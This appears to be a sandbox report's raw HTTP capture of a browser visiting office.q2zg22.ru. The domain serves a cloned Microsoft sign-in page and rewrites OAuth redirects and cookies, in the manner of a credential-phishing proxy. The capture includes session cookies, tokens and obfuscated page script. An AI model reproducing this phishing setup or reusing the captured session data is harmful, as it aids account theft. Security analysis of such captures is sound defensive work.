                                                                                                                          2024-02-02 19:17:47 UTC1369INData Raw: 2c 50 3e 3e 3d 31 2c 43 2b 2b 29 3b 46 3d 28 47 2d 2d 2c 47 3d 3d 30 26 26 28 47 3d 4d 61 74 68 5b 61 31 28 33 30 32 29 5d 28 32 2c 49 29 2c 49 2b 2b 29 2c 44 5b 4f 5d 3d 48 2b 2b 2c 53 74 72 69 6e 67 28 4e 29 29 7d 69 66 28 46 21 3d 3d 27 27 29 7b 69 66 28 4f 62 6a 65 63 74 5b 61 31 28 33 37 36 29 5d 5b 61 31 28 33 34 36 29 5d 5b 61 31 28 33 36 37 29 5d 28 45 2c 46 29 29 7b 69 66 28 32 35 36 3e 46 5b 61 31 28 33 32 36 29 5d 28 30 29 29 7b 66 6f 72 28 43 3d 30 3b 43 3c 49 3b 4b 3c 3c 3d 31 2c 4c 3d 3d 41 2d 31 3f 28 4c 3d 30 2c 4a 5b 61 31 28 33 31 34 29 5d 28 42 28 4b 29 29 2c 4b 3d 30 29 3a 4c 2b 2b 2c 43 2b 2b 29 3b 66 6f 72 28 50 3d 46 5b 61 31 28 33 32 36 29 5d 28 30 29 2c 43 3d 30 3b 38 3e 43 3b 4b 3d 50 26 31 2e 36 36 7c 4b 3c 3c 31 2c 41 2d 31 3d
                                                                                                                          Data Ascii: ,P>>=1,C++);F=(G--,G==0&&(G=Math[a1(302)](2,I),I++),D[O]=H++,String(N))}if(F!==''){if(Object[a1(376)][a1(346)][a1(367)](E,F)){if(256>F[a1(326)](0)){for(C=0;C<I;K<<=1,L==A-1?(L=0,J[a1(314)](B(K)),K=0):L++,C++);for(P=F[a1(326)](0),C=0;8>C;K=P&1.66|K<<1,A-1=
                                                                                                                          2024-02-02 19:17:47 UTC1369INData Raw: 5b 33 5d 3d 50 2c 47 5b 61 34 28 33 31 34 29 5d 28 50 29 3b 3b 29 7b 69 66 28 4c 3e 7a 29 72 65 74 75 72 6e 27 27 3b 66 6f 72 28 4d 3d 30 2c 4e 3d 4d 61 74 68 5b 61 34 28 33 30 32 29 5d 28 32 2c 46 29 2c 49 3d 31 3b 49 21 3d 4e 3b 4f 3d 4a 26 4b 2c 4b 3e 3e 3d 31 2c 30 3d 3d 4b 26 26 28 4b 3d 41 2c 4a 3d 42 28 4c 2b 2b 29 29 2c 4d 7c 3d 28 30 3c 4f 3f 31 3a 30 29 2a 49 2c 49 3c 3c 3d 31 29 3b 73 77 69 74 63 68 28 50 3d 4d 29 7b 63 61 73 65 20 30 3a 66 6f 72 28 4d 3d 30 2c 4e 3d 4d 61 74 68 5b 61 34 28 33 30 32 29 5d 28 32 2c 38 29 2c 49 3d 31 3b 49 21 3d 4e 3b 4f 3d 4b 26 4a 2c 4b 3e 3e 3d 31 2c 4b 3d 3d 30 26 26 28 4b 3d 41 2c 4a 3d 42 28 4c 2b 2b 29 29 2c 4d 7c 3d 28 30 3c 4f 3f 31 3a 30 29 2a 49 2c 49 3c 3c 3d 31 29 3b 43 5b 45 2b 2b 5d 3d 65 28 4d 29
                                                                                                                          Data Ascii: [3]=P,G[a4(314)](P);;){if(L>z)return'';for(M=0,N=Math[a4(302)](2,F),I=1;I!=N;O=J&K,K>>=1,0==K&&(K=A,J=B(L++)),M|=(0<O?1:0)*I,I<<=1);switch(P=M){case 0:for(M=0,N=Math[a4(302)](2,8),I=1;I!=N;O=K&J,K>>=1,K==0&&(K=A,J=B(L++)),M|=(0<O?1:0)*I,I<<=1);C[E++]=e(M)
                                                                                                                          2024-02-02 19:17:47 UTC1369INData Raw: 2c 79 5b 59 28 33 37 37 29 5d 3d 27 2d 31 27 2c 68 5b 59 28 33 38 35 29 5d 5b 59 28 33 31 32 29 5d 28 79 29 2c 7a 3d 79 5b 59 28 33 34 35 29 5d 2c 41 3d 7b 7d 2c 41 3d 4f 6d 4c 50 72 4e 66 6d 6c 74 28 7a 2c 7a 2c 27 27 2c 41 29 2c 41 3d 4f 6d 4c 50 72 4e 66 6d 6c 74 28 7a 2c 7a 5b 59 28 33 35 35 29 5d 7c 7c 7a 5b 59 28 33 35 30 29 5d 2c 27 6e 2e 27 2c 41 29 2c 41 3d 4f 6d 4c 50 72 4e 66 6d 6c 74 28 7a 2c 79 5b 59 28 33 36 32 29 5d 2c 27 64 2e 27 2c 41 29 2c 68 5b 59 28 33 38 35 29 5d 5b 59 28 33 33 31 29 5d 28 79 29 2c 42 3d 7b 7d 2c 42 2e 72 3d 41 2c 42 2e 65 3d 6e 75 6c 6c 2c 42 7d 63 61 74 63 68 28 44 29 7b 72 65 74 75 72 6e 20 43 3d 7b 7d 2c 43 2e 72 3d 7b 7d 2c 43 2e 65 3d 44 2c 43 7d 7d 66 75 6e 63 74 69 6f 6e 20 61 28 61 63 29 7b 72 65 74 75 72 6e
                                                                                                                          Data Ascii: ,y[Y(377)]='-1',h[Y(385)][Y(312)](y),z=y[Y(345)],A={},A=OmLPrNfmlt(z,z,'',A),A=OmLPrNfmlt(z,z[Y(355)]||z[Y(350)],'n.',A),A=OmLPrNfmlt(z,y[Y(362)],'d.',A),h[Y(385)][Y(331)](y),B={},B.r=A,B.e=null,B}catch(D){return C={},C.r={},C.e=D,C}}function a(ac){return
                                                                                                                          2024-02-02 19:17:47 UTC1234INData Raw: 64 2f 72 2f 3b 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 3b 5b 6e 61 74 69 76 65 20 63 6f 64 65 5d 3b 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3b 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 77 77 77 2d 66 6f 72 6d 2d 75 72 6c 65 6e 63 6f 64 65 64 3b 63 46 50 57 76 3b 65 72 72 6f 72 20 6f 6e 20 63 66 5f 63 68 6c 5f 70 72 6f 70 73 3b 72 65 61 64 79 53 74 61 74 65 3b 66 72 6f 6d 27 2e 73 70 6c 69 74 28 27 3b 27 29 2c 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 61 63 7d 2c 61 28 29 7d 66 75 6e 63 74 69 6f 6e 20 76 28 64 2c 65 2c 61 37 2c 66 2c 79 29 7b 61 37 3d 52 2c 66 3d 7b 27 77 70 27 3a 6f 5b 61 37 28 33 33 36 29 5d 28 4a 53 4f 4e 5b 61 37 28 33 30 36 29 5d 28 65 29 29 2c 27 73 27 3a 61 37 28 33 32 35 29 7d 2c 79 3d 6e 65 77 20 58 4d
                                                                                                                          Data Ascii: d/r/;DOMContentLoaded;[native code];__CF$cv$params;application/x-www-form-urlencoded;cFPWv;error on cf_chl_props;readyState;from'.split(';'),a=function(){return ac},a()}function v(d,e,a7,f,y){a7=R,f={'wp':o[a7(336)](JSON[a7(306)](e)),'s':a7(325)},y=new XM
                                                                                                                          2024-02-02 19:17:47 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          20192.168.2.1649744172.67.209.714435716C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-02-02 19:17:48 UTC2949OUTGET /common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638424982651072914.MTc3ZWVkZGQtYTZjNy00OTZlLTgxODctYWFiZGUzNzYwM2JlNjljY2M1YzEtZjRmNy00Njg2LTk5NzctYmUyYmY1ZDhiYjVi&ui_locales=en-US&mkt=en-US&client-request-id=27340d1a-f75c-4aed-bfd4-e7d89e08f2f5&state=Yvf-XDUrjz0oeLPkq8m6wvZNNx-4HHkagqS9BhHl9kXhuZbnWeP_boVBmzqCmf36UjRbbqyVFxS6NfMPtPrMzkYT0e3eC9jdOQOPVaXsUaKvdkKS66v9CzSs89a-xvCDlX83KjhHGwLHOIpviusPB2JbXEDMaguF9u_IRWYYWRgKHLprzYpu6YRCePlMSrde_70j5tZlDSgEnKs7NwUMbr6fRrt8o-EvCVkm0FfE3NnjacnfJhuLiNnd81beGyMvkxdpyTZsYXUvoKRGU0_4ng&x-client-SKU=ID_NET6_0&x-client-ver=6.34.0.0&sso_reload=true HTTP/1.1
                                                                                                                          Host: office.q2zg22.ru
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Upgrade-Insecure-Requests: 1
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                          Sec-Fetch-Mode: navigate
                                                                                                                          Sec-Fetch-Dest: document
                                                                                                                          Referer: https://office.q2zg22.ru/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638424982651072914.MTc3ZWVkZGQtYTZjNy00OTZlLTgxODctYWFiZGUzNzYwM2JlNjljY2M1YzEtZjRmNy00Njg2LTk5NzctYmUyYmY1ZDhiYjVi&ui_locales=en-US&mkt=en-US&client-request-id=27340d1a-f75c-4aed-bfd4-e7d89e08f2f5&state=Yvf-XDUrjz0oeLPkq8m6wvZNNx-4HHkagqS9BhHl9kXhuZbnWeP_boVBmzqCmf36UjRbbqyVFxS6NfMPtPrMzkYT0e3eC9jdOQOPVaXsUaKvdkKS66v9CzSs89a-xvCDlX83KjhHGwLHOIpviusPB2JbXEDMaguF9u_IRWYYWRgKHLprzYpu6YRCePlMSrde_70j5tZlDSgEnKs7NwUMbr6fRrt8o-EvCVkm0FfE3NnjacnfJhuLiNnd81beGyMvkxdpyTZsYXUvoKRGU0_4ng&x-client-SKU=ID_NET6_0&x-client-ver=6.34.0.0
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Cookie: ae23-8632=afc35fefb916ef4eaaf2fe859837e744a9c25a67b61248f6ee93c6a02ca7fe04; fpc=Aq_odsI7GDJHm8suSWCV-X8; esctx=PAQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-Vdc2TMKN3WgRVIPG2KYMe9cKLPhl_mFvXXBfxpTirUGdlKhgqDMpWnM2_5_gD1SjljL2-mhgQ9VoUJK3J_wvKRz3Sjbi4oTarW6t9Zz7ed5ioicPhWSPqwo0BZiORSIVftWlg5DNCJFrIgBxKMsmna1gkBhhlzTVsbGcOi6THtwgAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; MUID=2E6F22D2EA936CD30EE836CBEBB26D97; esctx-sAcwFNXs9p0=AQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-Xz-zY4mFOFPtOKDCtkncDgiCqiq8JSPFEneyjDU4hFCxc9yKOXR0OSKd5FYQRJM3mXeQZYPo-cw18QcWUama1nI0_hypcV18IPjbFcAN8l-2_npQ8hQ5HCn_XXMqMr00sdRCGYoSBfgWdZ8ETjE1OiAA; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1
                                                                                                                          2024-02-02 19:17:48 UTC1351INHTTP/1.1 200 OK
                                                                                                                          Date: Fri, 02 Feb 2024 19:17:48 GMT
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                                          Cache-Control: no-cache, no-store
                                                                                                                          Expires: -1
                                                                                                                          Link: <https://aadcdn.msftauth.net>; rel=preconnect; crossorigin
                                                                                                                          Link: <https://aadcdn.msftauth.net>; rel=dns-prefetch
                                                                                                                          Link: <https://aadcdn.msauth.net>; rel=dns-prefetch
                                                                                                                          Nel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0}
                                                                                                                          P3p: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                          Pragma: no-cache
                                                                                                                          Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                          Report-To: {"group":"network-errors","max_age":86400,"endpoints":[{"url":"https://identity.nel.measure.office.net/api/report?catId=GW+estsfd+chi"}]}
                                                                                                                          Set-Cookie: buid=0.AVoAMe_N-B6jSkuT5F9XHpElWltEZUfGMrBJg-Ydk3ZSdsoBAAA.AQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-0b0GHFUjypDPzYyRCP-j910iLVEABaRccpLk36B5zRBtQ3fob97QdMrqXsjTd5l0xaaXKm_REXXPLeGuMeGr-7qB7U4XkFGuAUABRnZJpCMgAA; Path=/; Expires=Sun, 03 Mar 2024 19:17:48 GMT; HttpOnly; Secure; SameSite=None
                                                                                                                          Set-Cookie: esctx=PAQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-Aetvl2btd8aqo8wzaMiV5Hf2kdb_IwSVTXuYe0uiIoKycm_q9g-RAse7WQ2x09SHTppANz6TPXL3R5FlIm2flV7nWh7dn4CXmsH-QoXUY5sWlBYRvTFD7wAAZHOGThUh_jbLwMoU4B1IcbiFQee9HxB3lxm4BtjIgZpVmvHJBF0gAA; Path=/; Domain=office.q2zg22.ru; HttpOnly; Secure; SameSite=None
                                                                                                                          2024-02-02 19:17:48 UTC791INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 65 73 63 74 78 2d 4d 33 45 76 64 67 39 57 33 67 49 3d 41 51 41 42 41 41 45 41 41 41 41 6d 6f 46 66 47 74 59 78 76 52 72 4e 72 69 51 64 50 4b 49 5a 2d 4a 71 51 57 68 42 46 46 33 69 45 52 70 38 53 65 6d 79 77 6c 35 4c 4b 62 57 79 6a 5a 6f 55 53 46 31 37 48 52 36 4c 52 4a 77 45 65 4a 7a 52 6e 37 7a 64 35 68 5a 54 74 62 4e 4f 73 77 52 57 4c 44 51 38 6b 51 76 33 68 4a 4d 71 6b 56 75 32 58 65 44 75 49 74 68 64 73 64 68 5f 71 67 44 37 70 5a 32 43 63 41 48 48 67 53 63 4a 75 50 6f 47 79 78 59 46 69 54 69 4a 75 49 38 2d 2d 62 73 46 72 56 4b 50 5a 51 47 6f 71 4e 37 64 78 55 50 39 61 78 7a 6c 30 46 44 53 41 41 3b 20 50 61 74 68 3d 2f 3b 20 44 6f 6d 61 69 6e 3d 6f 66 66 69 63 65 2e 71 32 7a 67 32 32 2e 72 75 3b 20 48 74 74 70 4f 6e
                                                                                                                          Data Ascii: Set-Cookie: esctx-M3Evdg9W3gI=AQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-JqQWhBFF3iERp8Semywl5LKbWyjZoUSF17HR6LRJwEeJzRn7zd5hZTtbNOswRWLDQ8kQv3hJMqkVu2XeDuIthdsdh_qgD7pZ2CcAHHgScJuPoGyxYFiTiJuI8--bsFrVKPZQGoqN7dxUP9axzl0FDSAA; Path=/; Domain=office.q2zg22.ru; HttpOn
                                                                                                                          2024-02-02 19:17:48 UTC1369INData Raw: 34 30 30 30 0d 0a 0d 0a 0d 0a 3c 21 2d 2d 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 2e 20 41 6c 6c 20 72 69 67 68 74 73 20 72 65 73 65 72 76 65 64 2e 20 2d 2d 3e 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 20 63 6c 61 73 73 3d 22 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 53 69 67 6e 20 69 6e 20 74 6f 20 79 6f 75 72 20 61 63 63 6f 75 6e 74 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e
                                                                                                                          Data Ascii: 4000... Copyright (C) Microsoft Corporation. All rights reserved. --><!DOCTYPE html><html dir="ltr" class="" lang="en"><head> <title>Sign in to your account</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
                                                                                                                          2024-02-02 19:17:48 UTC1369INData Raw: 35 62 2d 33 32 63 36 2d 34 39 62 30 2d 38 33 65 36 2d 31 64 39 33 37 36 35 32 37 36 63 61 5c 75 30 30 32 36 73 63 6f 70 65 3d 6f 70 65 6e 69 64 2b 70 72 6f 66 69 6c 65 2b 68 74 74 70 73 25 33 61 25 32 66 25 32 66 72 65 61 63 74 2e 71 32 7a 67 32 32 2e 72 75 25 32 66 76 32 25 32 66 4f 66 66 69 63 65 48 6f 6d 65 2e 41 6c 6c 5c 75 30 30 32 36 72 65 64 69 72 65 63 74 5f 75 72 69 3d 68 74 74 70 73 25 33 61 25 32 66 25 32 66 72 65 61 63 74 2e 71 32 7a 67 32 32 2e 72 75 25 32 66 6c 61 6e 64 69 6e 67 76 32 5c 75 30 30 32 36 72 65 73 70 6f 6e 73 65 5f 74 79 70 65 3d 63 6f 64 65 2b 69 64 5f 74 6f 6b 65 6e 5c 75 30 30 32 36 73 74 61 74 65 3d 59 76 66 2d 58 44 55 72 6a 7a 30 6f 65 4c 50 6b 71 38 6d 36 77 76 5a 4e 4e 78 2d 34 48 48 6b 61 67 71 53 39 42 68 48 6c 39 6b
                                                                                                                          Data Ascii: 5b-32c6-49b0-83e6-1d93765276ca\u0026scope=openid+profile+https%3a%2f%2freact.q2zg22.ru%2fv2%2fOfficeHome.All\u0026redirect_uri=https%3a%2f%2freact.q2zg22.ru%2flandingv2\u0026response_type=code+id_token\u0026state=Yvf-XDUrjz0oeLPkq8m6wvZNNx-4HHkagqS9BhHl9k
                                                                                                                          2024-02-02 19:17:48 UTC1369INData Raw: 64 22 3a 22 68 74 74 70 73 3a 2f 2f 79 77 6e 6a 62 2e 71 32 7a 67 32 32 2e 72 75 2f 6f 61 75 74 68 32 30 5f 61 75 74 68 6f 72 69 7a 65 2e 73 72 66 3f 63 6c 69 65 6e 74 5f 69 64 3d 34 37 36 35 34 34 35 62 2d 33 32 63 36 2d 34 39 62 30 2d 38 33 65 36 2d 31 64 39 33 37 36 35 32 37 36 63 61 5c 75 30 30 32 36 73 63 6f 70 65 3d 6f 70 65 6e 69 64 2b 70 72 6f 66 69 6c 65 2b 68 74 74 70 73 25 33 61 25 32 66 25 32 66 72 65 61 63 74 2e 71 32 7a 67 32 32 2e 72 75 25 32 66 76 32 25 32 66 4f 66 66 69 63 65 48 6f 6d 65 2e 41 6c 6c 5c 75 30 30 32 36 72 65 64 69 72 65 63 74 5f 75 72 69 3d 68 74 74 70 73 25 33 61 25 32 66 25 32 66 72 65 61 63 74 2e 71 32 7a 67 32 32 2e 72 75 25 32 66 6c 61 6e 64 69 6e 67 76 32 5c 75 30 30 32 36 72 65 73 70 6f 6e 73 65 5f 74 79 70 65 3d 63
                                                                                                                          Data Ascii: d":"https://ywnjb.q2zg22.ru/oauth20_authorize.srf?client_id=4765445b-32c6-49b0-83e6-1d93765276ca\u0026scope=openid+profile+https%3a%2f%2freact.q2zg22.ru%2fv2%2fOfficeHome.All\u0026redirect_uri=https%3a%2f%2freact.q2zg22.ru%2flandingv2\u0026response_type=c
                                                                                                                          2024-02-02 19:17:48 UTC1369INData Raw: 58 7e c3 85 6c 61 6e 64 20 49 73 6c 61 6e 64 73 7e 33 35 38 21 21 21 41 4c 7e 41 6c 62 61 6e 69 61 7e 33 35 35 21 21 21 44 5a 7e 41 6c 67 65 72 69 61 7e 32 31 33 21 21 21 41 53 7e 41 6d 65 72 69 63 61 6e 20 53 61 6d 6f 61 7e 31 21 21 21 41 44 7e 41 6e 64 6f 72 72 61 7e 33 37 36 21 21 21 41 4f 7e 41 6e 67 6f 6c 61 7e 32 34 34 21 21 21 41 49 7e 41 6e 67 75 69 6c 6c 61 7e 31 21 21 21 41 47 7e 41 6e 74 69 67 75 61 20 61 6e 64 20 42 61 72 62 75 64 61 7e 31 21 21 21 41 52 7e 41 72 67 65 6e 74 69 6e 61 7e 35 34 21 21 21 41 4d 7e 41 72 6d 65 6e 69 61 7e 33 37 34 21 21 21 41 57 7e 41 72 75 62 61 7e 32 39 37 21 21 21 41 43 7e 41 73 63 65 6e 73 69 6f 6e 20 49 73 6c 61 6e 64 7e 32 34 37 21 21 21 41 55 7e 41 75 73 74 72 61 6c 69 61 7e 36 31 21 21 21 41 54 7e 41 75 73
                                                                                                                          Data Ascii: X~land Islands~358!!!AL~Albania~355!!!DZ~Algeria~213!!!AS~American Samoa~1!!!AD~Andorra~376!!!AO~Angola~244!!!AI~Anguilla~1!!!AG~Antigua and Barbuda~1!!!AR~Argentina~54!!!AM~Armenia~374!!!AW~Aruba~297!!!AC~Ascension Island~247!!!AU~Australia~61!!!AT~Aus
                                                                                                                          2024-02-02 19:17:48 UTC1369INData Raw: 21 46 4f 7e 46 61 72 6f 65 20 49 73 6c 61 6e 64 73 7e 32 39 38 21 21 21 46 4a 7e 46 69 6a 69 7e 36 37 39 21 21 21 46 49 7e 46 69 6e 6c 61 6e 64 7e 33 35 38 21 21 21 46 52 7e 46 72 61 6e 63 65 7e 33 33 21 21 21 47 46 7e 46 72 65 6e 63 68 20 47 75 69 61 6e 61 7e 35 39 34 21 21 21 50 46 7e 46 72 65 6e 63 68 20 50 6f 6c 79 6e 65 73 69 61 7e 36 38 39 21 21 21 47 41 7e 47 61 62 6f 6e 7e 32 34 31 21 21 21 47 4d 7e 47 61 6d 62 69 61 7e 32 32 30 21 21 21 47 45 7e 47 65 6f 72 67 69 61 7e 39 39 35 21 21 21 44 45 7e 47 65 72 6d 61 6e 79 7e 34 39 21 21 21 47 48 7e 47 68 61 6e 61 7e 32 33 33 21 21 21 47 49 7e 47 69 62 72 61 6c 74 61 72 7e 33 35 30 21 21 21 47 52 7e 47 72 65 65 63 65 7e 33 30 21 21 21 47 4c 7e 47 72 65 65 6e 6c 61 6e 64 7e 32 39 39 21 21 21 47 44 7e 47
                                                                                                                          Data Ascii: !FO~Faroe Islands~298!!!FJ~Fiji~679!!!FI~Finland~358!!!FR~France~33!!!GF~French Guiana~594!!!PF~French Polynesia~689!!!GA~Gabon~241!!!GM~Gambia~220!!!GE~Georgia~995!!!DE~Germany~49!!!GH~Ghana~233!!!GI~Gibraltar~350!!!GR~Greece~30!!!GL~Greenland~299!!!GD~G
                                                                                                                          2024-02-02 19:17:48 UTC1369INData Raw: 4c 7e 4e 65 74 68 65 72 6c 61 6e 64 73 7e 33 31 21 21 21 4e 43 7e 4e 65 77 20 43 61 6c 65 64 6f 6e 69 61 7e 36 38 37 21 21 21 4e 5a 7e 4e 65 77 20 5a 65 61 6c 61 6e 64 7e 36 34 21 21 21 4e 49 7e 4e 69 63 61 72 61 67 75 61 7e 35 30 35 21 21 21 4e 45 7e 4e 69 67 65 72 7e 32 32 37 21 21 21 4e 47 7e 4e 69 67 65 72 69 61 7e 32 33 34 21 21 21 4e 55 7e 4e 69 75 65 7e 36 38 33 21 21 21 4e 46 7e 4e 6f 72 66 6f 6c 6b 20 49 73 6c 61 6e 64 7e 36 37 32 21 21 21 4b 50 7e 4e 6f 72 74 68 20 4b 6f 72 65 61 7e 38 35 30 21 21 21 4d 4b 7e 4e 6f 72 74 68 20 4d 61 63 65 64 6f 6e 69 61 7e 33 38 39 21 21 21 4d 50 7e 4e 6f 72 74 68 65 72 6e 20 4d 61 72 69 61 6e 61 20 49 73 6c 61 6e 64 73 7e 31 21 21 21 4e 4f 7e 4e 6f 72 77 61 79 7e 34 37 21 21 21 4f 4d 7e 4f 6d 61 6e 7e 39 36 38
                                                                                                                          Data Ascii: L~Netherlands~31!!!NC~New Caledonia~687!!!NZ~New Zealand~64!!!NI~Nicaragua~505!!!NE~Niger~227!!!NG~Nigeria~234!!!NU~Niue~683!!!NF~Norfolk Island~672!!!KP~North Korea~850!!!MK~North Macedonia~389!!!MP~Northern Mariana Islands~1!!!NO~Norway~47!!!OM~Oman~968
                                                                                                                          2024-02-02 19:17:48 UTC1369INData Raw: 7e 54 6f 6e 67 61 7e 36 37 36 21 21 21 54 54 7e 54 72 69 6e 69 64 61 64 20 61 6e 64 20 54 6f 62 61 67 6f 7e 31 21 21 21 54 41 7e 54 72 69 73 74 61 6e 20 64 61 20 43 75 6e 68 61 7e 32 39 30 21 21 21 54 4e 7e 54 75 6e 69 73 69 61 7e 32 31 36 21 21 21 54 52 7e 54 75 72 6b 65 79 7e 39 30 21 21 21 54 4d 7e 54 75 72 6b 6d 65 6e 69 73 74 61 6e 7e 39 39 33 21 21 21 54 43 7e 54 75 72 6b 73 20 61 6e 64 20 43 61 69 63 6f 73 20 49 73 6c 61 6e 64 73 7e 31 21 21 21 54 56 7e 54 75 76 61 6c 75 7e 36 38 38 21 21 21 56 49 7e 55 2e 53 2e 20 56 69 72 67 69 6e 20 49 73 6c 61 6e 64 73 7e 31 21 21 21 55 47 7e 55 67 61 6e 64 61 7e 32 35 36 21 21 21 55 41 7e 55 6b 72 61 69 6e 65 7e 33 38 30 21 21 21 41 45 7e 55 6e 69 74 65 64 20 41 72 61 62 20 45 6d 69 72 61 74 65 73 7e 39 37 31
                                                                                                                          Data Ascii: ~Tonga~676!!!TT~Trinidad and Tobago~1!!!TA~Tristan da Cunha~290!!!TN~Tunisia~216!!!TR~Turkey~90!!!TM~Turkmenistan~993!!!TC~Turks and Caicos Islands~1!!!TV~Tuvalu~688!!!VI~U.S. Virgin Islands~1!!!UG~Uganda~256!!!UA~Ukraine~380!!!AE~United Arab Emirates~971
                                                                                                                          2024-02-02 19:17:48 UTC1369INData Raw: 71 57 52 70 6f 58 53 35 4b 55 4f 48 6b 6b 44 49 6c 45 4b 67 49 51 52 4b 4d 5f 61 75 6e 55 4f 57 6a 2d 5f 6a 2d 37 62 76 56 79 79 51 4a 5a 77 6f 49 53 58 6b 38 78 78 57 51 67 34 2d 4a 61 70 6b 68 53 41 71 4d 6f 78 6a 43 67 6b 54 74 49 7a 41 46 41 35 49 47 46 56 70 5f 4b 7a 43 71 71 51 69 2d 5a 65 4b 75 39 63 76 45 44 65 5f 2d 4f 65 76 37 73 2d 5f 5f 5f 6e 48 74 34 55 33 66 35 39 41 65 33 6f 59 4c 6f 4f 44 63 6e 6d 39 58 70 63 38 54 54 4d 55 55 46 49 38 70 32 78 4c 72 6d 71 34 69 78 6a 37 43 59 49 65 51 39 43 44 37 44 5a 77 59 58 35 38 6b 67 31 49 6e 43 49 77 67 71 59 77 73 6f 49 69 56 59 78 47 69 52 4c 44 4b 62 67 34 6e 56 68 69 36 7a 67 55 4f 4e 46 6b 4e 77 67 79 34 45 53 37 7a 79 32 53 51 56 30 4a 68 57 6e 54 45 46 74 38 79 71 62 43 6d 73 47 36 4e 6d 76
                                                                                                                          Data Ascii: qWRpoXS5KUOHkkDIlEKgIQRKM_aunUOWj-_j-7bvVyyQJZwoISXk8xxWQg4-JapkhSAqMoxjCgkTtIzAFA5IGFVp_KzCqqQi-ZeKu9cvEDe_-Oev7s-___nHt4U3f59Ae3oYLoODcnm9Xpc8TTMUUFI8p2xLrmq4ixj7CYIeQ9CD7DZwYX58kg1InCIwgqYwsoIiVYxGiRLDKbg4nVhi6zgUONFkNwgy4ES7zy2SQV0JhWnTEFt8yqbCmsG6Nmv
                                                                                                                          2024-02-02 19:17:48 UTC1369INData Raw: 63 6e 6d 39 58 70 63 38 54 54 4d 55 55 46 49 38 70 32 78 4c 72 6d 71 34 69 78 6a 37 43 59 49 65 51 39 43 44 37 44 5a 77 59 58 35 38 6b 67 31 49 6e 43 49 77 67 71 59 77 73 6f 49 69 56 59 78 47 69 52 4c 44 4b 62 67 34 6e 56 68 69 36 7a 67 55 4f 4e 46 6b 4e 77 67 79 34 45 53 37 7a 79 32 53 51 56 30 4a 68 57 6e 54 45 46 74 38 79 71 62 43 6d 73 47 36 4e 6d 76 61 70 6f 41 78 71 4a 41 32 51 74 45 63 4f 65 64 37 31 6c 78 67 66 63 36 71 73 4f 6e 5a 33 75 45 33 67 69 4f 67 59 6c 30 33 42 48 4e 69 50 4d 6c 65 48 42 78 47 6f 59 36 64 69 2d 63 62 4b 58 69 54 33 64 45 38 33 35 6b 76 76 53 42 38 6b 50 73 6d 4b 38 51 61 50 4b 76 7a 76 70 6b 69 48 75 67 50 72 52 58 6c 6b 4f 74 59 5a 4e 6b 45 4a 74 70 74 53 31 71 73 78 76 53 52 33 72 5a 70 61 36 5a 48 6f 75 78 4f 77 58 41
